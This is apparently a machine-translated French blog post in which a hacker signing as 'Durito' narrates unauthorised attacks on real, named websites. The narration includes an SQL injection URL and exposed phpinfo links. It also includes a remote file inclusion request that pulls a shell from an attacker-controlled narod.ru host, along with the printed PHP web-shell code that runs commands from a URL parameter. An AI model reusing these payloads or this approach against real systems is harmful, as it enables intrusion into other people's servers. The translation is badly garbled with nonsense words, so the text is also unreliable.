Bonjour, vous navenoe pensez qu'il est une sorte de blague ou une coquille.
Pas du tout.
En règle générale, les pirates écrivent des articles avec des titres "" Comme cela a été compromise ... "
Dans cet article , nous allons aussi le piratage, mais sans le happy end traditionnel.
Bien que vous ne savez jamais ...
Un de ces jours , mon Asya assomme les gens avec l'offre de lui avoir accès à la même ressource.
Faites - moi était rien de spécial et je suis d' accord.
Après avoir examiné l'URL à eux, je l' ai vu un peu d'informations intéressantes:
http://www.russianspain.com/phpinfo.php
et , respectivement:
http://www.russianspain.com/php.ini
Grimpez sur le site, j'ai trouvé une autre occasion d'effectuer sql-injection, mais pas un message d'erreur, et je décidai de le laisser pour plus tard.
Briser site ip, je l' ai vu qu'il a été enregistré plus de 400 sites.
Je décidai de trier systématiquement à travers eux jusqu'à ce que je trouve un buggy.
Plusieurs fois je suis tombé sur la seconde branche de forums phpBB, mais le sql-injection a été coupé du tout.
biscuits Submenu moi avons eu accès au panneau d'administration, et la base sbekapil dans l'espoir que l' un des mots de passe à venir et ftp.
Une fois que j'attrapé avancée Livre d' or 2.2, inktsiya pour accéder au travail administratif, mais pour accéder et modifier modèle nécessaire paramètre plus valable de la session, ce qui m'a constamment et disposer sur la page de connexion.
Il y avait quelques sites avec sql-injection, tels que:
http://www.joehenke.com/gallery_view.php?galleryid=16+UNION+SELECT+1/*
mais sortir d'entre eux quelque chose de valable , j'échoué une fois.
Cela a duré jusqu'à ce que je suis tombé sur up-glass.com, site de la société "Unipack" qui produit des emballages pour l'industrie de l' alcool en Russie.
Voyant que le fichier inkluda, j'ai essayé de se connecter à votre shell narod.ru:
http://up-glass.com/former.php?folder=http://durito.narod.ru/sh&cmd=ls
Le serveur renvoie un message d'erreur:
Attention: lmenu (): php_network_getaddresses: getaddrinfo échoué: échec temporaire dans la résolution de nom dans /home/upglass/public_html/func.php sur la ligne 40
Attention: lmenu (http://durito.narod.ru/sh/config.p): failed to open stream: succès dans /home/upglass/public_html/func.php sur la ligne 40
Tout est devenu clair à la fois, je me suis rapidement versé dans le fichier config.p de votre site Web avec le contenu suivant:
<?
echo "<DIV align = left> <PRE>"; système ($ _ GET [ 'cmd ']); echo "</ PRE> </ DIV>"; ?>
et la requête suivante:
http://up-glass.com/former.php?folder=http://durito.narod.ru/&cmd=ls
m'a déjà donné une liste des fichiers du site
Mais je ne pouvais pas voir les répertoires des autres utilisateurs, même public_html était pas disponible pour moi.
Le noyau était frais:
cpanel05.gzo.com Linux 2.6.11.11 # 1 SMP mar 31 mai 14:02:19 CDT 2005 i686 i686 i386 GNU / Linux
rue pourrait oublier.
Alors je décide de revenir à la sql-injection à www.russianspain.com.
Seulement maintenant négligemment jeté Voir sur le contenu du site.
Je vis que les créateurs de vzlyad du site par rapport au président russe et ses politiques sont très proche de la mienne.
Après avoir lu l'article, je suis déterminé à quitter l' une des dernières voix libres de l'opposition seule.
De plus, je leur ai écrit au sujet des vulnérabilités sur le site, et a demandé à accrocher une bannière "Stop Poutine!".
Voilà l'histoire.
Votre bug Durito.
_________________
MANGER LES RICHES!
|
Commentaires
Commentant, gardez à l' esprit que le contenu et le ton de vos messages peuvent blesser les sentiments des gens réels, montrer du respect et de la tolérance à ses interlocuteurs, même si vous ne partagez pas leur avis, votre comportement en termes de liberté d'expression et de l' anonymat offert par Internet, est en train de changer non seulement virtuel, mais dans le monde réel. Tous les commentaires sont cachés à l'index, le contrôle anti - spam.